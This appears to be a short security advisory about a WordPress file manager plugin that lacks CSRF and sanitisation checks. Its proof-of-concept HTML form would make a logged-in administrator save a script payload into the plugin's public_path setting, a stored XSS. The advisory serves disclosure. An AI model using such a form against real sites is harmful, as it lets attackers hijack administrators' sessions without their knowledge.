The plugin is lacking CSRF as well as sanitisation checks, allowing attackers to perform CSRF attacks against logged in administrators and set an XSS payload in the public_path setting.
<form method="POST" action="https://example.com/wp-admin/admin.php?page=wp_file_manager_root">
<input type="text" name="public_path" value="%22%3E%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E"><br />
<input type="text" name="submit" value="Save Changes"><br />
<input type="submit">
</form>